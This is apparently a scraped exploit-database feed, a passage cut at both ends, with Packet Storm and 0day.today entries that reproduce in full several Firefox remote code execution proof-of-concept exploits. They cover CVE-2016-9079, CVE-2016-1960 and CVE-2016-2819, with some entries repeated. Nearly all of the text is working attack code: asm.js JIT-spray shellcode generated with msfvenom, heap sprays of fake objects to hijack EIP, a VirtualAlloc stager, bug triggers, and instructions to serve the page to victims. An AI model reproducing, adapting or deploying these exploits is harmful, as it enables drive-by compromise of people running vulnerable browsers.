+ 0xa890df01)|0; \nval = (val + 0xa802e2c1)|0; \nval = (val + 0xa890d701)|0; \nval = (val + 0xa8903f8b)|0; \nval = (val + 0xa890df01)|0; \nval = (val + 0xa890406a)|0; \nval = (val + 0xa890c031)|0; \nval = (val + 0xa85030b4)|0; \nval = (val + 0xa85010b4)|0; \nval = (val + 0xa890006a)|0; \nval = (val + 0xa890d7ff)|0; \nval = (val + 0xa890c931)|0; \nval = (val + 0xa89000b5)|0; \nval = (val + 0xa890c3b1)|0; \nval = (val + 0xa890ebd9)|0; \nval = (val + 0xa82434d9)|0; \nval = (val + 0xa890e689)|0; \nval = (val + 0xa80cc683)|0; \nval = (val + 0xa890368b)|0; \nval = (val + 0xa85fc683)|0; \nval = (val + 0xa890c789)|0; \nval = (val + 0xa81e8b66)|0; \nval = (val + 0xa81f8966)|0; \nval = (val + 0xa802c683)|0; \nval = (val + 0xa802c783)|0; \nval = (val + 0xa8901e8a)|0; \nval = (val + 0xa8901f88)|0; \nval = (val + 0xa803c683)|0; \nval = (val + 0xa801c783)|0; \nval = (val + 0xa803e983)|0; \nval = (val + 0xa89008e3)|0; \nval = (val + 0xa890cceb)|0; \nval = (val + 0xa890e0ff)|0; \nval = (val + 0xa824248d)|0; \n/* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */ \nval = (val + 0xa882e8fc)|0; \nval = (val + 0xa8000000)|0; \nval = (val + 0xa8e58960)|0; \nval = (val + 0xa864c031)|0; \nval = (val + 0xa830508b)|0; \nval = (val + 0xa80c528b)|0; \nval = (val + 0xa814528b)|0; \nval = (val + 0xa828728b)|0; \nval = (val + 0xa84ab70f)|0; \nval = (val + 0xa8ff3126)|0; \nval = (val + 0xa8613cac)|0; \nval = (val + 0xa82c027c)|0; \nval = (val + 0xa8cfc120)|0; \nval = (val + 0xa8c7010d)|0; \nval = (val + 0xa852f2e2)|0; \nval = (val + 0xa8528b57)|0; \nval = (val + 0xa84a8b10)|0; \nval = (val + 0xa84c8b3c)|0; \nval = (val + 0xa8e37811)|0; \nval = (val + 0xa8d10148)|0; \nval = (val + 0xa8598b51)|0; \nval = (val + 0xa8d30120)|0; \nval = (val + 0xa818498b)|0; \nval = (val + 0xa8493ae3)|0; \nval = (val + 0xa88b348b)|0; \nval = (val + 0xa831d601)|0; \nval = (val + 0xa8c1acff)|0; \nval = (val + 0xa8010dcf)|0; \nval = (val + 0xa8e038c7)|0; \nval = (val + 0xa803f675)|0; \nval = (val + 0xa83bf87d)|0; \nval = (val + 0xa875247d)|0; \nval = (val + 0xa88b58e4)|0; \nval = (val + 0xa8012458)|0; \nval = (val + 0xa88b66d3)|0; \nval = (val + 0xa88b4b0c)|0; \nval = (val + 0xa8011c58)|0; \nval = (val + 0xa8048bd3)|0; \nval = (val + 0xa8d0018b)|0; \nval = (val + 0xa8244489)|0; \nval = (val + 0xa85b5b24)|0; \nval = (val + 0xa85a5961)|0; \nval = (val + 0xa8e0ff51)|0; \nval = (val + 0xa85a5f5f)|0; \nval = (val + 0xa8eb128b)|0; \nval = (val + 0xa86a5d8d)|0; \nval = (val + 0xa8858d01)|0; \nval = (val + 0xa80000b2)|0; \nval = (val + 0xa8685000)|0; \nval = (val + 0xa86f8b31)|0; \nval = (val + 0xa8d5ff87)|0; \nval = (val + 0xa80efebb)|0; \nval = (val + 0xa868ea32)|0; \nval = (val + 0xa8bd95a6)|0; \nval = (val + 0xa8d5ff9d)|0; \nval = (val + 0xa87c063c)|0; \nval = (val + 0xa8fb800a)|0; \nval = (val + 0xa80575e0)|0; \nval = (val + 0xa81347bb)|0; \nval = (val + 0xa86a6f72)|0; \nval = (val + 0xa8ff5300)|0; \nval = (val + 0xa86d63d5)|0; \nval = (val + 0xa8652e64)|0; \nval = (val + 0xa8006578)|0; \nval = (val + 0xa8909090)|0; \n \nreturn val|0; \n} \nreturn payload_code \n} \n</script> \n \n<script> \nfunction spray_asm_js_modules(){ \nsprayed = [] \nfor (var i=0; i<= 0x1800; i++){ \nsprayed[i] = asm_js_module() \n} \n} \n \n/* heap spray inspired by skylined */ \nfunction heap_spray_fake_objects(){ \nvar heap = [] \nvar current_address = 0x08000000 \nvar block_size = 0x1000000 \nwhile(current_address < object_target_address){ \nvar heap_block = new Uint32Array(block_size/4 - 0x100) \nfor (var offset = 0; offset < block_size; offset += 0x100000){ \n \n/* fake object target = ecx + 0x88 and fake vtable*/ \nheap_block[offset/4 + 0x00/4] = object_target_address \n/* self + 4 */ \nheap_block[offset/4 + 0x14/4] = object_target_address \n/* the path to EIP */ \nheap_block[offset/4 + 0x18/4] = 4 \nheap_block[offset/4 + 0xac/4] = 1 \n/* fake virtual function --> JIT target */ \nheap_block[offset/4 + 0x138/4] = jit_payload_target \n} \nheap.push(heap_block) \ncurrent_address += block_size \n} \nreturn heap \n} \n \n/* address of fake object */ \nobject_target_address = 0x30300000 \n \n/* address of our jitted shellcode */ \njit_payload_target = 0x1c1c0054 \n \n/* ASM.JS JIT Spray */ \nspray_asm_js_modules() \n \n/* Spray fake objects */ \nheap = heap_spray_fake_objects() \n \n/* -----> */ \n/* bug trigger ripped from bugzilla report */ \nvar worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage(\"one\");postMessage(\"two\");};'); \nworker.postMessage(\"zero\"); \nvar svgns = 'http://www.w3.org/2000/svg'; \nvar heap80 = new Array(0x1000); \nvar heap100 = new Array(0x4000); \nvar block80 = new ArrayBuffer(0x80); \nvar block100 = new ArrayBuffer(0x100); \nvar sprayBase = undefined; \nvar arrBase = undefined; \nvar animateX = undefined; \nvar containerA = undefined; \nvar offset = 0x88 // Firefox 50.0.1 \n \nvar exploit = function(){ \nvar u32 = new Uint32Array(block80) \n \nu32[0x4] = arrBase - offset; \nu32[0xa] = arrBase - offset; \nu32[0x10] = arrBase - offset; \n \nfor(i = heap100.length/2; i < heap100.length; i++) \n{ \nheap100[i] = block100.slice(0) \n} \n \nfor(i = 0; i < heap80.length/2; i++) \n{ \nheap80[i] = block80.slice(0) \n} \n \nanimateX.setAttribute('begin', '59s') \nanimateX.setAttribute('begin', '58s') \n \nfor(i = heap80.length/2; i < heap80.length; i++) \n{ \nheap80[i] = block80.slice(0) \n} \n \nfor(i = heap100.length/2; i < heap100.length; i++) \n{ \nheap100[i] = block100.slice(0) \n} \n \nanimateX.setAttribute('begin', '10s') \nanimateX.setAttribute('begin', '9s') \ncontainerA.pauseAnimations(); \n} \n \nworker.onmessage = function(e) {arrBase=object_target_address; exploit()} \n//worker.onmessage = function(e) {arrBase=0x30300000; exploit()} \n \nvar trigger = function(){ \ncontainerA = document.createElementNS(svgns, 'svg') \nvar containerB = document.createElementNS(svgns, 'svg'); \nanimateX = document.createElementNS(svgns, 'animate') \nvar animateA = document.createElementNS(svgns, 'animate') \nvar animateB = document.createElementNS(svgns, 'animate') \nvar animateC = document.createElementNS(svgns, 'animate') \nvar idA = \"ia\"; \nvar idC = \"ic\"; \nanimateA.setAttribute('id', idA); \nanimateA.setAttribute('end', '50s'); \nanimateB.setAttribute('begin', '60s'); \nanimateB.setAttribute('end', idC + '.end'); \nanimateC.setAttribute('id', idC); \nanimateC.setAttribute('end', idA + '.end'); \ncontainerA.appendChild(animateX) \ncontainerA.appendChild(animateA) \ncontainerA.appendChild(animateB) \ncontainerB.appendChild(animateC) \ndocument.body.appendChild(containerA); \ndocument.body.appendChild(containerB); \n} \n \nwindow.onload = trigger; \nsetInterval(\"window.location.reload()\", 3000) \n/* <----- */ \n \n</script> \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/143373/firefox5001-exec.txt"}, {"lastseen": "2018-03-23T01:30:24", "bulletinFamily": "exploit", "description": "", "modified": "2018-03-16T00:00:00", "published": "2018-03-16T00:00:00", "href": "https://packetstormsecurity.com/files/146819/Firefox-44.0.2-ASM.JS-JIT-Spray-Remote-Code-Execution.html", "id": "PACKETSTORM:146819", "type": "packetstorm", "title": "Firefox 44.0.2 ASM.JS JIT-Spray Remote Code Execution", "sourceData": "`<!DOCTYPE HTML> \n \n<!-- \n \nFULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375) \n*PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960) \nASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018 \n \nTested on: \nFirefox 44.0.2 32-bit - Windows 10 1709 \nhttps://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe \n \nHowto: \n1) serve PoC over network and open it in Firefox 44.0.2 32-bit \n2) A successfull exploit attempt should pop calc.exe \n \nMozilla Bug Report: \nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1246014 \n \n \nWriteup: \nhttps://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/ \n \n \n- For research purposes only - \n \n(C) Rh0 \n \nMar. 13, 2018 \n \nNotes: \n*) very similar to CVE-2016-2819, but still different: \n*) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1 \nbecause in 46.0.1 it is already fixed. \n*) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it \nwas fixed in Firefox > 46.0.1 \n \n--> \n \n<title>CVE-2016-1960 and ASM.JS JIT-Spray</title> \n<head> \n<meta charset=UTF-8 /> \n<script> \n\"use strict\" \n \nvar Exploit = function(){ \nthis.asmjs = new Asmjs() \nthis.heap = new Heap() \n} \n \nExploit.prototype.go = function(){ \n/* target address of fake node object */ \nvar node_target_addr = 0x20200000 \n \n/* target address of asm.js float pool payload*/ \nvar target_eip = 0x3c3c1dc8 \n \n/* spray fake Node objects */ \nthis.heap.spray(node_target_addr, target_eip) \n \n/* spray asm.js float constant pools */ \nthis.asmjs.spray_float_payload(0x1800) \n \n/* go! */ \nthis.trigger_vuln(node_target_addr) \n}; \n \n \nExploit.prototype.trigger_vuln = function(node_ptr){ \ndocument.body.innerHTML = '<table><svg><div id=\"AAAA\">' \nthis.heap.gc() \nvar a = new Array() \nfor (var i=0; i < 0x11000; i++){ \n/* array element (Node object ptr) control with integer underflow */ \na[i] = new Uint32Array(0x100/4) \nfor (var j=0; j<0x100/4; j++) \na[i][j] = node_ptr \n} \n \n/* original crashing testcase \ndocument.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>'; \n*/ \n \n/* easier to exploit codepath */ \ndocument.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>'; \n \nwindow.location.reload() \n}; \n \n \nvar Asmjs = function(){}; \n \nAsmjs.prototype.asm_js_module = function(stdlib, ffi){ \n\"use asm\" \nvar foo = ffi.foo \nfunction payload(){ \nvar val = 0.0 \n/* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/ \nval = +foo( \n// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py \n-1.587865768352248e-263, \n-8.692422460804815e-255, \n7.529882109376901e-114, \n2.0120602207293977e-16, \n3.7204662687249914e-242, \n4.351158092040946e+89, \n2.284741716118451e+270, \n7.620699014501263e-153, \n5.996021286047645e+44, \n-5.981935902612295e-92, \n6.23540918304361e+259, \n1.9227873281657598e+256, \n2.0672493951546363e+187, \n-6.971032919585734e+91, \n5.651413300798281e-134, \n-1.9040061366251406e+305, \n-1.2687640718807038e-241, \n9.697849844423e-310, \n-2.0571400761625145e+306, \n-1.1777948610587587e-123, \n2.708909852013898e+289, \n3.591750823735296e+37, \n-1.7960516725035723e+106, \n6.326776523166028e+180 \n) \nreturn +val; \n} \nreturn payload \n}; \n \nAsmjs.prototype.spray_float_payload = function(regions){ \nthis.modules = new Array(regions).fill(null).map( \nregion => this.asm_js_module(window, {foo: () => 0}) \n) \n}; \n \nvar Heap = function(target_addr, eip){ \nthis.node_heap = [] \n}; \n \n \nHeap.prototype.spray = function(node_target_addr, target_eip){ \nvar junk = 0x13371337 \nvar current_address = 0x08000000 \nvar block_size = 0x1000000 \nwhile(current_address < node_target_addr){ \nvar fake_objects = new Uint32Array(block_size/4 - 0x100) \nfor (var offset = 0; offset < block_size; offset += 0x100000){ \n/* target Node object needed to control EIP */ \nfake_objects[offset/4 + 0x00/4] = 0x29 \nfake_objects[offset/4 + 0x0c/4] = 3 \nfake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18 \nfake_objects[offset/4 + 0x18/4] = 1 \nfake_objects[offset/4 + 0x1c/4] = junk \nfake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24 \nfake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28 \nfake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c \nfake_objects[offset/4 + 0x2c/4] = target_eip \n} \nthis.node_heap.push(fake_objects) \ncurrent_address += block_size \n} \n}; \n \nHeap.prototype.gc = function(){ \nfor (var i=0; i<=10; i++) \nvar x = new ArrayBuffer(0x1000000) \n}; \n \n</script> \n<head> \n<body onload='exploit = new Exploit(); exploit.go()' /> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146819/firefox4402asmjs-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-01T21:32:12", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2018-03-17T00:00:00", "published": "2018-03-17T00:00:00", "href": "https://0day.today/exploit/description/30002", "id": "1337DAY-ID-30002", "title": "Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit", "type": "zdt", "sourceData": "<!DOCTYPE HTML>\r\n \r\n<!--\r\n \r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)\r\n ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018\r\n \r\n Tested on:\r\n Firefox 46.0.1 32-bit - Windows 10 1709\r\n https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe\r\n \r\n Howto:\r\n 1) serve PoC over network and open it in Firefox 46.0.1 32-bit\r\n 2) A successfull exploit attempt should pop calc.exe\r\n \r\n Mozilla Bug Report:\r\n https://bugzilla.mozilla.org/show_bug.cgi?id=1270381\r\n \r\n \r\n Writeup: \r\n https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/\r\n \r\n \r\n - For research purposes only -\r\n \r\n (C) Rh0\r\n \r\n Mar. 13, 2018\r\n \r\n-->\r\n \r\n<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>\r\n<head>\r\n<meta charset=UTF-8 />\r\n<script>\r\n\"use strict\"\r\n \r\nvar Exploit = function(){\r\n this.asmjs = new Asmjs()\r\n this.heap = new Heap()\r\n}\r\n \r\nExploit.prototype.go = function(){\r\n /* target address of fake node object */\r\n var node_target_addr = 0x5a500000 \r\n \r\n /* target address of asm.js float pool payload*/\r\n var target_eip = 0x20200b58\r\n \r\n /* spray asm.js float constant pools */\r\n this.asmjs.spray_float_payload(0x1000)\r\n \r\n /* spray fake Node objects */\r\n this.heap.spray(node_target_addr, target_eip)\r\n \r\n /* go! */\r\n this.trigger_vuln(node_target_addr)\r\n};\r\n \r\n \r\nExploit.prototype.trigger_vuln = function(node_ptr){\r\n document.body.innerHTML = '<table><svg><div id=\"BBBB\">'\r\n this.heap.gc()\r\n var a = new Array() \r\n for (var i=0; i < 0x10100; i++){\r\n /* array element (Node object ptr) control with integer underflow */\r\n a[i] = new Uint32Array(0x100/4)\r\n for (var j=0; j<0x100/4; j++)\r\n a[i][j] = node_ptr \r\n }\r\n \r\n /* original crashing testcase\r\n document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'\r\n */\r\n \r\n /* easier to exploit codepath */\r\n document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'\r\n \r\n window.location.reload()\r\n};\r\n \r\n \r\nvar Asmjs = function(){};\r\n \r\nAsmjs.prototype.asm_js_module = function(stdlib, ffi){\r\n \"use asm\"\r\n var foo = ffi.foo\r\n function payload(){\r\n var val = 0.0\r\n /* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/\r\n val = +foo(\r\n // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py\r\n -1.587865768352248e-263,\r\n -8.692422460804815e-255,\r\n 7.529882109376901e-114,\r\n 2.0120602207293977e-16,\r\n 3.7204662687249914e-242,\r\n 4.351158092040946e+89,\r\n 2.284741716118451e+270,\r\n 7.620699014501263e-153,\r\n 5.996021286047645e+44,\r\n -5.981935902612295e-92,\r\n 6.23540918304361e+259,\r\n 1.9227873281657598e+256,\r\n 2.0672493951546363e+187,\r\n -6.971032919585734e+91,\r\n 5.651413300798281e-134,\r\n -1.9040061366251406e+305,\r\n -1.2687640718807038e-241,\r\n 9.697849844423e-310,\r\n -2.0571400761625145e+306,\r\n -1.1777948610587587e-123,\r\n 2.708909852013898e+289,\r\n 3.591750823735296e+37,\r\n -1.7960516725035723e+106,\r\n 6.326776523166028e+180\r\n )\r\n return +val;\r\n }\r\n return payload\r\n};\r\n \r\nAsmjs.prototype.spray_float_payload = function(regions){\r\n this.modules = new Array(regions).fill(null).map(\r\n region => this.asm_js_module(window, {foo: () => 0})\r\n )\r\n};\r\n \r\nvar Heap = function(target_addr, eip){\r\n this.node_heap = []\r\n};\r\n \r\n \r\nHeap.prototype.spray = function(node_target_addr, target_eip){\r\n var junk = 0x13371337\r\n var current_address = 0x20000000\r\n var block_size = 0x1000000\r\n while(current_address < node_target_addr){\r\n var fake_objects = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n /* target Node object needed to control EIP */\r\n fake_objects[offset/4 + 0x00/4] = 0x29 \r\n fake_objects[offset/4 + 0x0c/4] = 3\r\n fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18\r\n fake_objects[offset/4 + 0x18/4] = 1\r\n fake_objects[offset/4 + 0x1c/4] = junk\r\n fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24\r\n fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28\r\n fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c\r\n fake_objects[offset/4 + 0x2c/4] = target_eip \r\n }\r\n this.node_heap.push(fake_objects)\r\n current_address += block_size\r\n }\r\n};\r\n \r\nHeap.prototype.gc = function(){\r\n for (var i=0; i<=10; i++)\r\n var x = new ArrayBuffer(0x1000000)\r\n};\r\n \r\n</script>\r\n<head>\r\n<body onload='exploit = new Exploit(); exploit.go()' />\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30002"}, {"lastseen": "2018-03-19T02:11:48", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2018-03-17T00:00:00", "published": "2018-03-17T00:00:00", "href": "https://0day.today/exploit/description/30001", "id": "1337DAY-ID-30001", "type": "zdt", "title": "Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution Exploit", "sourceData": "<!DOCTYPE HTML>\r\n \r\n<!--\r\n \r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)\r\n ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018\r\n \r\n Tested on:\r\n Firefox 44.0.2 32-bit - Windows 10 1709\r\n https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe\r\n \r\n Howto:\r\n 1) serve PoC over network and open it in Firefox 44.0.2 32-bit\r\n 2) A successfull exploit attempt should pop calc.exe\r\n \r\n Mozilla Bug Report:\r\n https://bugzilla.mozilla.org/show_bug.cgi?id=1246014\r\n \r\n \r\n Writeup: \r\n https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/\r\n \r\n \r\n - For research purposes only -\r\n \r\n (C) Rh0\r\n \r\n Mar. 13, 2018\r\n \r\n Notes:\r\n *) very similar to CVE-2016-2819, but still different:\r\n *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1\r\n because in 46.0.1 it is already fixed.\r\n *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it\r\n was fixed in Firefox > 46.0.1\r\n \r\n-->\r\n \r\n<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>\r\n<head>\r\n<meta charset=UTF-8 />\r\n<script>\r\n\"use strict\"\r\n \r\nvar Exploit = function(){\r\n this.asmjs = new Asmjs()\r\n this.heap = new Heap()\r\n}\r\n \r\nExploit.prototype.go = function(){\r\n /* target address of fake node object */\r\n var node_target_addr = 0x20200000 \r\n \r\n /* target address of asm.js float pool payload*/\r\n var target_eip = 0x3c3c1dc8\r\n \r\n /* spray fake Node objects */\r\n this.heap.spray(node_target_addr, target_eip)\r\n \r\n /* spray asm.js float constant pools */\r\n this.asmjs.spray_float_payload(0x1800)\r\n \r\n /* go! */\r\n this.trigger_vuln(node_target_addr)\r\n};\r\n \r\n \r\nExploit.prototype.trigger_vuln = function(node_ptr){\r\n document.body.innerHTML = '<table><svg><div id=\"AAAA\">'\r\n this.heap.gc()\r\n var a = new Array() \r\n for (var i=0; i < 0x11000; i++){\r\n /* array element (Node object ptr) control with integer underflow */\r\n a[i] = new Uint32Array(0x100/4)\r\n for (var j=0; j<0x100/4; j++)\r\n a[i][j] = node_ptr \r\n }\r\n \r\n /* original crashing testcase\r\n document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';\r\n */\r\n \r\n /* easier to exploit codepath */\r\n document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';\r\n \r\n window.location.reload()\r\n};\r\n \r\n \r\nvar Asmjs = function(){};\r\n \r\nAsmjs.prototype.asm_js_module = function(stdlib, ffi){\r\n \"use asm\"\r\n var foo = ffi.foo\r\n function payload(){\r\n var val = 0.0\r\n /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/\r\n val = +foo(\r\n // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py\r\n -1.587865768352248e-263,\r\n -8.692422460804815e-255,\r\n 7.529882109376901e-114,\r\n 2.0120602207293977e-16,\r\n 3.7204662687249914e-242,\r\n 4.351158092040946e+89,\r\n 2.284741716118451e+270,\r\n 7.620699014501263e-153,\r\n 5.996021286047645e+44,\r\n -5.981935902612295e-92,\r\n 6.23540918304361e+259,\r\n 1.9227873281657598e+256,\r\n 2.0672493951546363e+187,\r\n -6.971032919585734e+91,\r\n 5.651413300798281e-134,\r\n -1.9040061366251406e+305,\r\n -1.2687640718807038e-241,\r\n 9.697849844423e-310,\r\n -2.0571400761625145e+306,\r\n -1.1777948610587587e-123,\r\n 2.708909852013898e+289,\r\n 3.591750823735296e+37,\r\n -1.7960516725035723e+106,\r\n 6.326776523166028e+180\r\n )\r\n return +val;\r\n }\r\n return payload\r\n};\r\n \r\nAsmjs.prototype.spray_float_payload = function(regions){\r\n this.modules = new Array(regions).fill(null).map(\r\n region => this.asm_js_module(window, {foo: () => 0})\r\n )\r\n};\r\n \r\nvar Heap = function(target_addr, eip){\r\n this.node_heap = []\r\n};\r\n \r\n \r\nHeap.prototype.spray = function(node_target_addr, target_eip){\r\n var junk = 0x13371337\r\n var current_address = 0x08000000\r\n var block_size = 0x1000000\r\n while(current_address < node_target_addr){\r\n var fake_objects = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n /* target Node object needed to control EIP */\r\n fake_objects[offset/4 + 0x00/4] = 0x29 \r\n fake_objects[offset/4 + 0x0c/4] = 3\r\n fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18\r\n fake_objects[offset/4 + 0x18/4] = 1\r\n fake_objects[offset/4 + 0x1c/4] = junk\r\n fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24\r\n fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28\r\n fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c\r\n fake_objects[offset/4 + 0x2c/4] = target_eip \r\n }\r\n this.node_heap.push(fake_objects)\r\n current_address += block_size\r\n }\r\n};\r\n \r\nHeap.prototype.gc = function(){\r\n for (var i=0; i<=10; i++)\r\n var x = new ArrayBuffer(0x1000000)\r\n};\r\n \r\n</script>\r\n<head>\r\n<body onload='exploit = new Exploit(); exploit.go()' />\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/30001", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-07T23:48:22", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2017-07-15T00:00:00", "published": "2017-07-15T00:00:00", "href": "https://0day.today/exploit/description/28138", "id": "1337DAY-ID-28138", "title": "Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit", "type": "zdt", "sourceData": "<!DOCTYPE HTML>\r\n \r\n<!--\r\n \r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)\r\n \r\n Tested on:\r\n \r\n Release 50.0.1 32-bit - Windows 8.1 / Windows 10\r\n https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe\r\n \r\n Howto:\r\n \r\n 1) serve PoC over network and open it in Firefox 50.0.1 32-bit\r\n 2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe\r\n \r\n A successfull exploit attempt should pop cmd.exe\r\n \r\n Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/\r\n \r\n (C) Rh0\r\n \r\n Jul. 13, 2017\r\n \r\n-->\r\n \r\n<script async>\r\nfunction asm_js_module(){\r\n \"use asm\";\r\n /* huge jitted nop sled */\r\n function payload_code(){\r\n var val = 0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n /* 3 byte VirtualAlloc RWX stager */\r\n val = (val + 0xa890db31)|0;\r\n val = (val + 0xa89030b3)|0;\r\n val = (val + 0xa81b8b64)|0;\r\n val = (val + 0xa80c5b8b)|0;\r\n val = (val + 0xa81c5b8b)|0;\r\n val = (val + 0xa8b9006a)|0;\r\n val = (val + 0xa8904c4c)|0;\r\n val = (val + 0xa8902eb1)|0;\r\n val = (val + 0xa85144b5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8903233)|0;\r\n val = (val + 0xa89045b1)|0;\r\n val = (val + 0xa8514cb5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8904e52)|0;\r\n val = (val + 0xa8904bb1)|0;\r\n val = (val + 0xa85145b5)|0;\r\n val = (val + 0xa8590e6a)|0;\r\n val = (val + 0xa84fe789)|0;\r\n val = (val + 0xa8086b8b)|0;\r\n val = (val + 0xa820738b)|0;\r\n val = (val + 0xa8471b8b)|0;\r\n val = (val + 0xa82ae349)|0;\r\n val = (val + 0xa890c031)|0;\r\n val = (val + 0xa890ad66)|0;\r\n val = (val + 0xa89c613c)|0;\r\n val = (val + 0xa8077c9d)|0;\r\n val = (val + 0xa890202c)|0;\r\n val = (val + 0xa89c073a)|0;\r\n val = (val + 0xa8d7749d)|0;\r\n val = (val + 0xa890bdeb)|0;\r\n val = (val + 0xa8b9006a)|0;\r\n val = (val + 0xa890636f)|0;\r\n val = (val + 0xa8906cb1)|0;\r\n val = (val + 0xa8516cb5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa890416c)|0;\r\n val = (val + 0xa89075b1)|0;\r\n val = (val + 0xa85161b5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8907472)|0;\r\n val = (val + 0xa89056b1)|0;\r\n val = (val + 